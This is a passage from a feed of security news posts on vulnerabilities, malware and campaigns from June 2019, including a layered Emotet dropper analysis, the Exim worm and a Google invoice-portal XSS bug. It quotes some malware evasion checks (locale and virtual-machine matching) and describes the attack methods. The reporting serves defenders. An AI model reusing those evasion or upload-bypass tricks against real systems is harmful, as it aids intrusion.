CVE-2019-5599, aka SACK Slowness, affects FreeBSD 12 using the RACK TCP Stack. An attacker could exploit it by delivering a crafted sequence of SACKs which will fragment the RACK send map.

“It is possible to send a crafted sequence of SACKs which will fragment the RACK send map. An attacker may be able to further exploit the fragmented send map to cause an expensive linked-list walk for subsequent SACKs received for that same TCP connection.” continues the advisory.

CVE-2019-5599 can be addressed by applying “split_limit.patch and set the net.inet.tcp.rack.split_limit sysctl to a reasonable value to limit the size of the SACK table.”

Admins could also temporarily disable the RACK TCP stack.

“Good system and application coding and configuration practices (limiting write buffers to the necessary level, monitoring connection memory consumption via SO_MEMINFO, and aggressively closing misbehaving connections) can help to limit the impact of attacks against these kinds of vulnerabilities,” concludes Netflix Information Security.

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)

The post Multiple DoS vulnerabilities affect Linux and FreeBSD appeared first on Security Affairs.

A free Decryptor tool for GandCrab Ransomware released

Good news for the victims of the latest variants of the GandCrab ransomware, NoMoreRansomware released a free decryption tool.

Victims of the latest variants of the GandCrab ransomware can now decrypt their files for free using a free decryptor tool released on the the NoMoreRansom website. The tool works with versions 5 to 5.2 of the ransomware, as well as versions 1 and 4. 

“On 17 June, a new decryption tool for the latest version of the most prolific ransomware family GandCrab has been released free of charge on www.nomoreransom.org.” reads the press release published by the Eurpol. “This tool allows victims of ransomware to regain access to their information encrypted by hackers, without having to pay demanded ransoms.”

The GandCrab decryptor tool is the result of a partnership with law enforcement agencies from Austria (Bundeskriminalambt – BMI), Belgium (Federal Computer Crime Unit), Bulgaria (General Directorate Combating Organized Crime – Cybercrime Department), France (Police Judiciaire de Paris – Befti), Germany (LKA Baden-Württemberg), the Netherlands (High Tech Crime Unit), Romania (DIICOT), the United Kingdom (NCA and Metropolitan Police), the United States (FBI) and Europol and its Joint Cybercrime Action Taskforce (J-CAT), together with the private partner Bitdefender.

The ransomware appeared in the threat landscape early 2018 when experts at cyber security firm LMNTRIX discovered a new ransomware-as-a-service dubbed GandCrab. The RaaS was advertised in Russian hacking community on the dark web, researchers noticed that authors leverage the RIG and GrandSoft exploit kits to distribute the malware.

In more than one year its operators released several versions with numerous enhancements, but in June they announced they are shutting down their operation and affiliates are being told to stop distributing the ransomware.

GandCrab ransomware V4

In October 2018, experts at the Cybaze Z-Lab have analyzed one of the latest iterations of the infamous GandCrab ransomware, the version 5.0.

The operators revealed they have generated more than $2 billion in ransom payments, earning on average of $2.5 million dollars per week. The operators also declared to have earned a net of $150 million that now have invested in legal activities.

Experts at BitDefender pointed out that not all victims are treated equally:

“GandCrab prioritizes ransomed information and sets individual pricing by type of victim.” read a blog post published by BitDefender. “An average computer costs from $600 and $2,000 to decrypt, and a server decryption costs $10,000 and more. While helping victims with decryption, we’ve seen ransom notes asking for as much as $700,000, which is quite a price for one wrong click,”

According to the Europol, previously released tools for the GandCrab ransomware have helped more than 30 000 victims recover their data for free and save roughly $50 million in unpaid ransoms. 

The joint efforts have also weakened the operators’ position on the cyber crime market and have led to the demise and shutdown of the operation by authorities. Bitdefender and McAfee experts provided a significant contribution to the fight against this threat. 

You can download the GandGrab decryption tool for free at the following address:

https://labs.bitdefender.com/wp-content/uploads/downloads/gandcrab-removal-tool-v1-v4-v5/

Pierluigi Paganini

(SecurityAffairs – ransomare, decryptor tools)

The post A free Decryptor tool for GandCrab Ransomware released appeared first on Security Affairs.

NYT Report: U.S. Cyber units planted destructive Malware in Russian Power Grid

According to The New York Times, the United States planted destructive malware in Russia’s electric power grid.

The New York Times, citing current and former government officials, revealed that the United States planted a potentially destructive malware in Russia’s electric power grid.

The U.S. cyber army is targeting the Russian power grid since at least 2012 with reconnaissance operations, but recently it also carried out more offensive operations. According to the officials, US cyber soldiers attempted to deploy destructive malware inside the Russian power grid.

“Since at least 2012, current and former officials say, the United States has put reconnaissance probes into the control systems of the Russian electric grid.” states the NYT.

“But now the American strategy has shifted more toward offense, officials say, with the placement of potentially crippling malware inside the Russian system at a depth and with an aggressiveness that had never been tried before.”

Russian power grid

The hacking operations aimed at warning the Russian Government about the cyber capabilities of the U.S. Cyber Command and that could be used as a deterrent to the continuous interference attributed to Russian state-sponsored hackers. It is important to highlight that we have evidence that the malware used by the US Cyber units caused any disruption to the target systems.

President Trump publicly denied the revelation made by the NYT:

The New York Times added that according to two US officials Trump was completely informed about cyber operations conducted by the US Cyber Command. High officials inside the US Cyber Command might have hidden the details of the cyber attacks inside the Russian power grid fearing a possible reaction of the President due to its relationship with President Putin.

“Two administration officials said they believed Mr. Trump had not been briefed in any detail about the steps to place “implants” — software code that can be used for surveillance or attack — inside the Russian grid.” continues the newspaper.

“Pentagon and intelligence officials described broad hesitation to go into detail with Mr. Trump about operations against Russia for concern over his reaction — and the possibility that he might countermand it or discuss it with foreign officials, as he did in 2017when he mentioned a sensitive operation in Syria to the Russian foreign minister.”

In July 2018, the US Department of Homeland Security declared that Russia’s APT groups have already penetrated America’s critical infrastructure, especially power utilities, and continue to target them.

“In the past few months, Cyber Command’s resolve has been tested. For the past year, energy companies in the United States and oil and gas operators across North America discovered their networks had been examined by the same Russian hackers who successfully dismantled the safety systems in 2017 at Petro Rabigh, a Saudi petrochemical plant and oil refinery.” concludes the NYT.

“The question now is whether placing the equivalent of land mines in a foreign power network is the right way to deter Russia. While it parallels Cold War nuclear strategy, it also enshrines power grids as a legitimate target.”

Pierluigi Paganini

(SecurityAffairs – Russian power grid, hacking)

The post NYT Report: U.S. Cyber units planted destructive Malware in Russian Power Grid appeared first on Security Affairs.

From Targeted Attack to Untargeted Attack

Today I’d like to share an interesting and heavily obfuscated Malware which made me thinking about the meaning of ‘Targeted Attack’.

Nowadays a Targeted Attack is mostly used to address state assets or business areas. For example a targeted attack might address Naval industry (MartyMcFly example is definitely a great example) or USA companies (Botnet Against USA, Canada and Italy is another great example) and are mainly built focusing specific target sectors. When I looked into at the following sample (which is a clear stereotype of an increasing trend of similar threats) I noticed a paradigm shift from: “What to target” to “what to untarget”. In other words it looks like the attacker does’t have a clear vision about his desired victims but contrary he has real clear intentions to what kind of victims must be avoided. But let’s start from the beginning.

Looking for a public sample submitted to Yomi (Yoroi’s public SandBox system) it caught my eyes the following one (sha256: c63cfa16544ca6998a1a5591fee9ad4d9b49d127e3df51bd0ceff328aa0e963a)

Public Submitted Sample on Yomi

The file looks like a common XLS file within low Antivirus detection rate as shown in the following image (6/63).

Antivirus Detection Rate

By taking a closer look to the Office file it’s easy to spot “Auto Open” procedures in VBA. The initial script is obfuscated through integer conversion and variable concatenation. A simple break-point and a message box to externalize the real payload would be enough to expose the second stage, which happens to be written in powershell.

Deobfuscated Stage1 to Obfuscate Stage2

The second stage is obfuscated through function array enumeration and integer conversion as well. It took some minutes to understand how to move from the obfuscated version to a plain text readable format as shown in the next picture.

Stage2 Obfuscated
Stage2 DeObfuscated

Here comes the interesting side of the entire attack chain (at least in my persona point of view). As you might appreciate from the deo-bfuscated Stage2 code (previous image) two main objects are downloaded and run from external sources. The ‘*quit?’ object downloads a Windows PE (Stage3_a) and runs it, while the ‘need=js’ object returns an additional obfuscated javascript stage, let’s call it Stage3_b. We’ll take care about those stages later on, for now let’s focus on the initial conditional branch which discriminates the real behavior versus the fake behavior; in other words it decides if run or stop the execution of the real behavior. While the second side of the conditional branch is quite a normal behavior match "VirtualBox|VMware|KVM",which tries to avoid the execution on virtual environments (trying to avoid detection and analysis), the first side is quite interesting. (GET-UICulture).Name -match "RO|CN|UA|BY|RU" tries to locate the victim machine and decides to attack everybody but not Romania, Ukraine, China, Russia and Belarus. So we are facing an one’s complement to targeted attack. I’d like to call it “untargeted” attack, which is not an opportunistic attack. Many questions come in my mind, for example why do not attack those countries ? Maybe does the attacker fear those countries or does the attacker belong to that area ? Probably we’ll never get answers to such a questions but we might appreciate this intriguing attack behavior. (BTW, I’m aware this is not the first sample with this characteristic but I do know that it’s a increasing trend). But let’s move on the analysis.

Stage3_a

Stge3_b is clearly the last infection stage. It looks like a romantic Emotet according to many Antivirus so I wont invest timing into this well-known Malware.

Stage3_b

This stage looks like a quite big and obfuscated Javascript code. The obfuscation implements three main techniques:

  • Encoded strings. The strings have been encoded in different ways, from “to Integer” to “Hexadecimal”.
  • String concatenation and and dynamic evaluation. Using eval to dynamically extract values which would be used to decode more strings
  • String Substitutions. Through find and replace functions and using loop to extract sub-strings the attacker hides the clear text inside charset noise

After some “hand work” finally Stage3_b deobfuscated came out. The following image shows the deobfuscation versus obfuscation section. We are still facing one more obfuscated stage, lets call it Stage4_b which happens to be, again, an obfuscated powershell script… how about that !?

Stage3_b Obfuscated
Stage3_b Deobfuscated (obfuscated Stage4_b)


Stage4_b uses the same obfuscation techniques seen in Stage2, so let’s use the same deobfusction technique, so let’s do it ! Hummm, but .. wait a minute… we already know that, it’s the deobfuscated Stage2! So we have two command and control servers serving the final launching script and getting persistence on the victim.

Deobfuscated Stage4_b

Conclusion

Even if the Sample is quite interesting per-se – since getting a low AV detection rate – it is not my actual point today. What is interesting is the introduction of another “targeting” state. We were accustomed to see targeted attacks, by meaning of attacks targeting specific industries or specific sectors or specific states, and opportunistic attacks, by meaning of attacks spread all over the world without specific targets. Today we might introduce one more “attack type” the untargeted attack, by meaning of attacking everybody but not specific assets, industries or states (like in this analyzed case)

Further technical details, including IoCs and Yara rules are reported in the original post published on the Marco Ramilli’s blog:

https://marcoramilli.com/2019/06/17/from-targeted-attack-to-untargeted-attack/

About the author Marco Ramilli

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – targeted attack, hacking)



The post From Targeted Attack to Untargeted Attack appeared first on Security Affairs.

Hacker is targeting DNA sequencer applications from Iranian IP address

Threat actors are targeting Web-based DNA sequencer applications leveraging a still-unpatched zero-day to take over the targeted systems.

Starting from June 12, 2019, the researcher Ankit Anubhav from NewSky Security, observed threat actors targeting Web-based DNA sequencer applications. The attackers are leveraging a still-unpatched zero-day vulnerability, tracked as CVE-2017-6526, to gain full control over the targeted systems.

The vulnerability in dnaLIMS was reported to the vendor in 2017, but it is still unpatched.

The attackers are scanning the Internet for dnaLIMS, a web-based application to handle DNA sequencing operations, these devices are used in the research industry. The attacks were originated from the 2.176.78.42 IP address that is located in Iran.

“From June 12 – 14, we saw regular attacks from 2.176.78.42 , an IP located in Iran, utilizing CVE-2017-6526, an issue in dnaTools dnaLIMS 4-2015s13. According to dnatools.com, dnaLIMS™ is a Web based bioinformatics LIMS that provides scientists and researches with hardware independent software tools for processing and managing DNA sequencing requests.” reads a blog post published by the expert.

The hackers leverage the vulnerability to bind a shell and take control of the web server.

Why DNA sequencing apps?

Attackers could be interested in stealing hashes of DNA sequences from the application’s database to resell them on the dark web or compromising servers to add to their botnet.

We cannot exclude that threat actor behind these attacks are using exploit available online at random in the attempt of compromise the large number of systems.

It is still unclear why attackers are targeting DNA sequencing apps, the number of these devices is limited (only a few tens of devices exposed online) and it is unlike that hackers want to use compromise systems to carry out DDoS attacks.

“The exact motives of the attacker(s) is unknown. Unlike an IPCamera or Router based IoT device, these are very unique devices installed in scientific ,academic and medical institutions. As a result,the number of such devices is not very high and might not help greatly in DDoS.” concludes the expert.

“However, successful exploitation and DNA theft in specific cases can be fruitful. Either it can be sold in black market, or a high profile attacker can actually be looking for a specific persons’ data.

We are not aware of a patch for this bug. In fact, when we had a look at the original disclosure by ShoreBreakSecurity, we saw a funny disclosure response by the vendor,indicating they don’t take DNA theft seriously.”

The expert also analyzed historical activity related to the attacker’s IP address and discovered that it was also associated with nmap scans and with the use of two other exploits for Zyxel routers (CVE-2017-6884) and for Apache Struts flaw (CVE-2017-5638).

Pierluigi Paganini

(SecurityAffairs – DNA sequencer applications, hacking)

The post Hacker is targeting DNA sequencer applications from Iranian IP address appeared first on Security Affairs.

Bella Thorne published her private nude photos before a hacker that was threatening her

Bella Thorne is the last victim of a sextortion attack, in a case similar to the Fappening saga, a hacker threatened the actress to publish her private nude photos.

The hacker first obtained nude photos of Bella Thorne then threatened her to leak online the picture, but she gave an unsettling answer.

Bella Thorne published tweets of the stolen photos putting the hacker out of play.

The actress explained she has been harassed for the past 24 hours by a hacker who accessed to her nude photos.

bella thorne

The above message suggests that Bella Thorne has already reported to the authorities the sextortion attempts.

“For too long I let a man take advantage of me over and over and I’m f**king sick of it, I’m putting this out because it’s MY DECISION NOW U DONT GET TO TAKE YET ANOTHER THING FROM ME.” wrote the actress.

“I can sleep tonight better knowing I took my power back. U can’t control my life u never will.”

According to BleepingComputer, the hacker also shared with Thorne nude photos of other celebrities.

Pierluigi Paganini

(SecurityAffairs – Thorne, hacking)

The post Bella Thorne published her private nude photos before a hacker that was threatening her appeared first on Security Affairs.

New Echobot Botnet targets Oracle, VMware Apps and includes 26 Exploits

Operators behind the Echobot botnet added new exploits to infect IoT devices, and also enterprise apps Oracle WebLogic and VMware SD-Wan.

Recently a new botnet, tracked Echobot, appeared in the threat landscape its operators are adding new exploits to infect a broad range of systems, including IoT devices, enterprise apps Oracle WebLogic and VMware SD-Wan.

The Echobot botnet was first detected by experts at PaloAlto Networks early this month, the botnet is based on the dreaded Mirai botnet. At the time of its discovery, operators added 8 new exploits, but currently, it includes 26 exploits.

The popular expert Larry Cashdollar, from Akamai’s Security Intelligence Response Team (SIRT), spotted a new version of the Echobot botnet that counts 26 different exploits.

“I recently came across an updated version of the Echobot binary that had some interesting additions. The first binary I found was compiled for ARM and still had the debugging information intact, which made it a little easier to analyze. While examining that binary, I discovered the system hosting the binaries and downloaded an x86 version that also still had the debugging symbols intact.” wrote the expert.

“I counted 26 different exploits that were being used in the spread of this botnet. Most were well-known command execution vulnerabilities in various networked devices.”

Cashdollar published a table comparing the two versions of Echobot and the exploits they use.

Echobot targets

The latest Echobot variant targets routers, network-attached storage devices (NAS), network video recorders (NVR), IP cameras, wireless presentation systems, and VoIP phones.

The experts pointed out that was not simple to determine the vulnerabilities that were being exploited by the botnet because some of them had no CVE numbers assigned.  

After the contacted MITRE, the organizations assigned them identification numbers.

Below the list of the exploits included in the Echobot variant discovered by the expert, some of the flaws triggered by the bot are decade-old vulnerabilities:

Echobot

The most interesting aspect of this new botnet is the fact that it also includes exploits for Oracle WebLogic Server and for networking software VMware SD-WAN.

“What I found the most interesting, and not so surprising, is the inclusion of cross-application vulnerabilities. For example, rather than sticking to devices with embedded OSs like routers, cameras, and DVRs, IoT botnets are now using vulnerabilities in enterprise web (Oracle WebLogic) and networking software (VMware SD-WAN) to infect targets and propagate malware.” added the expert.

“Also of note is the inclusion of 10+ year old exploits for network devices that I believe may never have been patched by the vendors. This alludes to the botnet developers deliberately targeting unpatched legacy vulnerabilities.”

Botnet operators continue to implement new methods to make their malware more aggressive and to infect the larger number of systems as possible. The latest Echobot variant targets flaws in IoT devices and in enterprise systems as well.

“Botnet developers are always looking for ways to spread malware. They are not just relying on exploiting new vulnerabilities that target IoT devices, but vulnerabilities in enterprise systems as well. Some of the new exploits they’ve added are older and have remained unpatched by the vendor. It seems the updates to Echobot are targeting systems that have possibly remained in service, but whose vulnerabilities were forgotten.” concluded the expert.

“This is an interesting tactic as these systems if found have remained vulnerable for years and will probably remain vulnerable for many more. Also, there are not just new exploitation vectors to examine but attack vectors as well. New weaknesses in popular protocols and services that can be leveraged to amplify and reflect attacks will be discovered.”

Pierluigi Paganini

(SecurityAffairs – Echobot botnet, IoT)

The post New Echobot Botnet targets Oracle, VMware Apps and includes 26 Exploits appeared first on Security Affairs.

Linux worm spreading via Exim servers hit Azure customers

On Friday, security experts at Microsoft warned of a new Linux worm, spreading via Exim email servers, that already compromised some Azure installs.

Bad actors continue to target cloud services in the attempt of abusing them for several malicious purposes, like storing malware or implementing command and control servers.

Microsoft Azure is not immune, recently experts reported several attacks leveraging the platform to host tech-support scam and phishing templates.

Researchers already warned of the presence of some malware on the Microsoft Azure platform.

At the end of last week, Microsoft warned of a new Linux worm, spreading via Exim servers, that already compromised some Azure installs.

Recently security experts reported ongoing attacks targeting millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions. Different groups of hackers are exploiting the CVE-2019-10149 flaw to take over them.

The critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw could be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.

Exim CVE-2019-10149

The CVE-2019-10149 issue resides in the deliver_message() function in /src/deliver.c and it is caused by the improper validation of recipient addresses. The flaw could lead to remote code execution with root privileges on the mail server, unfortunately, the vulnerability is easily exploitable by a local and a remote attacker in certain non-default configurations

The CVE-2019-10149 flaw was addressed the Exim’s development team with the release of version 4.92 in February, but a large number of operating systems are still affected by the flaw.

CVE-2019-10149, which was first discovered on June 5, is now being used as the vulnerability for a widespread campaign to attack exim servers and propagate across the Internet.” reads a blog post published by Cybereason.

“We are aware of an initial wave of attacks as described by Freddie Leeman on June 9, 2019. The first hacker group began pushing exploits from a C2 server located on the clear web. A second round of attacks by a different attacker are being analyzed by the Nocturnus team.”

Attackers are scanning the internet for vulnerable mail servers then when they will be compromised the initially deployed script will download a second script designed to check if OpenSSH is installed on the compromised machine.

In case OpenSSH is not present, it will install it and start it to gain root logins via SSH using a private/public RSA key for authentication.

Microsoft has now detected a Linux worm that leverages the above flaw in vulnerable Linux Exim email servers in a cryptojacking campaign.

“This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, CVE-2019-10149, in Linux Exim email servers running Exim version 4.87 to 4.91. Azure customers running VMs with Exim 4.92 are not affected by this vulnerability.” reads the advisory published by Microsoft.

Microsoft pointed out that Azure has already implemented controls to limit the spread of this Linux worm, but warns customers of using up to date software to prevent the infection. 

“Customers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs.” continues the advisory. “As this vulnerability is being actively exploited by worm activity, MSRC urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim.”

Pierluigi Paganini

(SecurityAffairs – Exim, Linux worm)

The post Linux worm spreading via Exim servers hit Azure customers appeared first on Security Affairs.

Security Affairs newsletter Round 218 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

newsletter Digging The Deep Web

Once again thank you!

Critical RCE affects older Diebold Nixdorf ATMs
Facebook is going to stop Huawei pre-installing apps on mobile devices
Millions of Exim mail servers vulnerable to cyber attacks
CIA sextortion campaign, analysis of a well-organized scam
CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system
Microsoft warns of spam campaign exploiting CVE-2017-11882 flaw
Retro video game website Emuparadise suffered a data breach
Shanghai Jiao Tong University data leak – 8.4TB in email metadata exposed
Spain extradites 94 Taiwanese to China phone and online fraud charges
Adobe Patch Tuesday updates fix code execution issues in Campaign, ColdFusion, and Flash
Customs and Border Protection (CBP) confirms hack of a subcontractor
CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign
How Ursnif Evolves to Keep Threatening Italy
MuddyWater APT group updated its multi-stage PowerShell backdoor Powerstats
Vulnerability in WordPress Live Chat Plugin allows to steal and hijack sessions
FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor
Google expert disclosed details of an unpatched flaw in SymCrypt library
Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws
Radiohead releases a trove of stolen music in response to the hack
RAMBleed, a new Side-Channel Attack that allows stealing sensitive data
Flaw in Evernote Web Clipper for Chrome extension allows stealing data
Massive DDos attack hit Telegram, company says most of junk traffic is from China
Ransomware paralyzed production for at least a week at ASCO factories
WAGO Industrial Switches affected by multiple flaws
Dissecting NanoCore Crimeware Attack Chain
French authorities released the PyLocky decryptor for versions 1 and 2
Millions of Exim mail servers are currently under attack
Mozilla addressed flaws in Thunderbird that allow code execution
Yubico is replacing for free YubiKey FIPS devices due to security weakness
Xenotime threat actor now is targeting Electric Utilities in US and APAC

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 218 – News of the week appeared first on Security Affairs.

XSS flaw would have allowed hackers access to Google’s network and impersonate its employees

Bug hunter Thomas Orlita discovered an XSS vulnerability in Google’s Invoice Submission Portal that would have allowed attackers access to Google’s internal network

The Czech researcher Thomas Orlita discovered an XSS vulnerability in Google’s Invoice Submission Portal that would have allowed attackers access to part of Google’s internal network.

The Google Invoice Submission Portal is a public portal used by Google’s business partners to submit invoices.

An attacker could also exploit the flaw to steal Google employee cookies for internal apps and hijack accounts or send spear-phishing messages.

The attack was devised by the expert in February, and Google addressed the issue in mid-April after the researcher reported it to the tech giant.

Orlita explained that an attacker could have uploaded malformed files in the Google Invoice Submission Portal, via the Upload Invoice field.

The expert noticed that the ‘upload’ feature for actual invoice in PDF format could be abused to upload HTML files. The attacker had to intercept a request and change the uploaded file’s filename and Content-Type properties to HTML.

Using this trick it was possible to store malicious files in Google’s invoicing system and would have executed automatically when an employee tried to access it.

Google xss Invoice Submission Portal

“Since this is just a front-end validation, it doesn’t stop us from changing the file type when sending the upload POST request. Once we select any PDF file, an upload request is fired. We can intercept the request using a web proxy debugger and change the filename and the contents from .pdf to .html.” reads the analysis published by the expert.

Orlita uploaded an HTML file including an XSS payload that, when triggered, would send him an email every time it was loaded.

A few days later, the expert received an email message showing that the JavaScript code in the XSS payload had been executed on the googleplex.com domain.

This domain is used by Google for hosting internal websites and apps. If you attempt to access the domain you will be redirected to a Google Corp login page for Google employees that requires the authentication.

“The DOM of the page matches the XSS payload that was put instead of the PDF file. We can see that this URL is used for displaying a PDF file. But since the Content-Type of the uploaded file was changed from application/pdf to text/html, it displayed and rendered the XSS payload instead of the PDF.” continues the expert.

According to the researcher, it was possible to exploit the flaw to execute arbitrary code on behalf of Google employees and gain access to sensitive information.

The expert pointed out that many Google internal apps are hosted on the googleplex.com domain, making this issue a gift for the attackers,

Below the timeline for the flaw:

21.02.2019: Vulnerability reported
22.02.2019: Priority changed to P2 
22.02.2019: Added more information 
25.02.2019: Accepted and priority changed to P1 
06.03.2019: Reward issued 
26.03.2019: A fix has been implemented 
11.04.2019: Issue marked as fixed

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)

The post XSS flaw would have allowed hackers access to Google’s network and impersonate its employees appeared first on Security Affairs.

Crooks exploit exposed Docker APIs to build AESDDoS botnet

Cybercriminals are attempting to exploit an API misconfiguration in Docker containers to infiltrate them and run the Linux bot AESDDoS.

Hackers are attempting to exploit an API misconfiguration in the open-source version of the popular DevOps tool Docker Engine-Community to infiltrate containers and run the Linux bot AESDDoS (Backdoor.Linux.DOFLOO.AA).

Threat actors are actively scanning the Internet for exposed Docker APIs on port 2375 and use them to deliver a malicious code that drops the AESDDoS Trojan.

“In this new attack, the threat actor first externally scans a given IP range by sending a TCP SYN packet to port 2375, the default port used for communicating with the Docker daemon.” reads the analysis published by Trend Micro. “Once an open port is identified, a connection asking for running containers is established. When a running container is spotted, the AESDDoS bot is then deployed using the docker exec command, which allows shell access to all applicable running containers within the exposed host. Hence, the malware is executed within an already running container while trying to hide its own presence.”

The AESDDoS malware is active since at least since 2014 and it was used to build large DDoS botnet. in some cases, it was also used in cryptojacking campaigns.

In recent months, threat actors focused their attention on misconfigured Docker services that could be abused for several malicious purposes.

“A batch file first executes the WinEggDrop scanner (s.exe), which tries port 2375 on various hosts with Chinese IP address ranges specified in the ip.txt file.” states the report. “The output of this command is saved into a file named ips.txt, which is then fed into the Docker.exe file.

We have also observed that the threat actor abuses a tool called the Docker Batch Test Tool that was developed to detect vulnerabilities in Docker.”

The malware also collects system information and send it back to the C2, depending on the specific hardware configuration the attackers can choose which kind of activity to carry out (i.e. launching DDoS attacker, mining cryptocurrency, etc.)

In the campaign observed by Trend Micro, the bot was deployed using the docker exec command to misconfigured containers.

The malware could allow the attackers to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.

The analysis published by Trend Micro includes technical details of the attacks and a list of Indicators of Compromise (IOCs).

In March, hundreds of Docker hosts were compromised in cryptojacking campaigns exploiting the CVE-2019-5736 runc vulnerability disclosed in February.

In order to secure Docker hosts admins should allow only trusted sources to access the Docker API, below some recommendations provided by Trend Micro.

“Docker explicitly warns against setting the Docker daemon to listen on port 2375 as this will give anyone the ability to gain root access to the host where the daemon is running, hence access to the API and address must be heavily restricted.” concludes the report.

“To prevent container-based incidents from happening, organizations can follow these guidelines:

  • Check API configuration. 
  • Implement the principle of least privilege. 
  • Follow recommended best practices. 
  • Employ automated runtime and image scanning to gain further visibility into the container’s processes (e.g., to determine if it has been tampered with or has vulnerabilities).”

Pierluigi Paganini

(SecurityAffairs – containers, hacking)


The post Crooks exploit exposed Docker APIs to build AESDDoS botnet appeared first on Security Affairs.

Xenotime threat actor now is targeting Electric Utilities in US and APAC

Experts at Dragos firm reported that Xenotime threat actor behind the 2017 Trisis/Triton malware attack is targeting electric utilities in the US and APAC.

Xenotime threat actor is considered responsible for the 2017 Trisis/Triton malware attack that hit oil and gas organizations.

In December 2017, the Triton malware  (aka Trisis) was discovered by researchers at FireEye, it was specifically designed to target industrial control systems (ICS) system.

Security experts at CyberX who analyzed samples of the malware provided further details on the attack, revealing that Triton was likely developed by Iran and used to target an organization in Saudi Arabia.

In October 2018, FireEye experts discovered a link between the Triton malware, tracked by the company as TEMP.Veles, and the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM), that is a Russian government research institute in Moscow.

Now, according to security firm Dragos, the group is targeting electric utilities in the United States and the Asia-Pacific (APAC) region.

“In February 2019, while working with clients across various utilities and regions, Dragos identified a persistent pattern of activity attempting to gather information and enumerate network resources associated with US and Asia-Pacific electric utilities.” reads a blog post published by Dragos.

“This behavior could indicate the activity group was preparing for a further cyberattack, or at minimum satisfying the prerequisites for a future ICS-focused intrusion.”

Xenotime has been active since at least 2014, its activity was discovered in 2017 after it caused a shutdown at a critical infrastructure organization somewhere in Saudi Arabia.

The group used a piece of malware known as Trisis, Triton and HatMan, and it targeted Schneider Electric’s Triconex safety instrumented systems (SIS) through a zero-day vulnerability. The attack was discovered after a SIS triggered a shutdown of some industrial systems, which experts believe hackers caused by accident.

Triton Xenotime

Dragos experts revealed that the attacks against entities in the United States and the APAC region were similar to ones that targeted organizations in the oil and gas sector. The good news is that all the attacks carried out by the Xenotime group failed into breaching the targeted organization.

“The activities are consistent with Stage 1 ICS Cyber Kill Chain reconnaissance and initial access operations, including observed incidents of attempted authentication with credentials and possible credential ‘stuffing,’ or using stolen usernames and passwords to try and force entry into target accounts.” continues the report.

Dragos warns that Xenotime poses a serious threat to electric utilities that uses ICS-SCADA systems similar to the ones in the oil and gas industries.

“Electric utility environments are significantly different from oil and gas operations in several aspects, but electric operations still have safety and protection equipment that could be targeted with similar tradecraft. XENOTIME expressing consistent, direct interest in electric utility operations is a cause for deep concern given this adversary’s willingness to compromise process safety – and thus integrity – to fulfill its mission.” continues the experts.

Dragos presented research on Xenotime at SecurityWeek’s 2018 ICS Cyber Security Conference held in Atlanta, below the video of the presentation:

“Dragos emphasizes that the observed behavior is an expansion, a proliferation of the threat, and not a shift – oil and gas entities must still grapple with this adversary’s activity.” concludes Dragos. “While unfortunate, the expansion should serve as a clear signal to ICS operators – not only in oil and gas or electric utility operations – that the time to plan, implement, and enforce security standards and response processes in industrial environments is now.”

Pierluigi Paganini

(SecurityAffairs – Triton malware, Xenotime)

The post Xenotime threat actor now is targeting Electric Utilities in US and APAC appeared first on Security Affairs.

Mozilla addressed flaws in Thunderbird that allow code execution

Mozilla released security updates for the Thunderbird email client that address vulnerabilities that could allow code execution on impacted systems. 

Mozilla released security updates for the Thunderbird email client that address vulnerabilities that could be exploited by attackers to execute arbitrary code on impacted systems. 

Mozilla released Thunderbird version 60.7.1 that addresses three High severity vulnerabilities and one Low risk issue. 

The three High severity vulnerabilities addressed by Mozilla are:

  • CVE-2019-11703 – heap buffer overflow in the function icalparser.c;
  • CVE-2019-11704 – heap buffer overflow in the function icalvalue.c;
  • CVE-2019-11705 – stack buffer overflow in the function calrecur.c; 

The Low risk issue, tracked as CVE-2019-11706, is a type confusion in icalproperty.c. 

“Mozilla has released a security update to address vulnerabilities in Thunderbird. An attacker could exploit these vulnerabilities to take control of an affected system.” reads the advisory published by the US-CERT.

“The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisory for Thunderbird 60.7.1 and apply the necessary update.” 

The vulnerabilities affect all the Thunderbird versions prior to 60.7.1.  

Depending on the user’s privileges, an attacker could carry out several malicious activities, such as installing malicious applications and creating new admin accounts. 

Mozilla credited the researcher Luis Merino of X41 D-Sec for the discovery of the above flaws. The vulnerabilities affect the implementation of iCal functions, they could be used to cause a crash of the system when processing specially crafted email messages.

The expert pointed out that the flaws cannot be triggered via email in Thunderbird because the scripting is disabled when reading mail. The issue could be exploitable in browser or browser-like contexts.

The good news is Mozilla is not aware of any attack exploiting the flaws in the wild.

Pierluigi Paganini

(SecurityAffairs – Thunderbird, hacking)

The post Mozilla addressed flaws in Thunderbird that allow code execution appeared first on Security Affairs.

Millions of Exim mail servers are currently under attack

Hackers are targeting millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions, threat actors leverage the CVE-2019-10149 flaw.

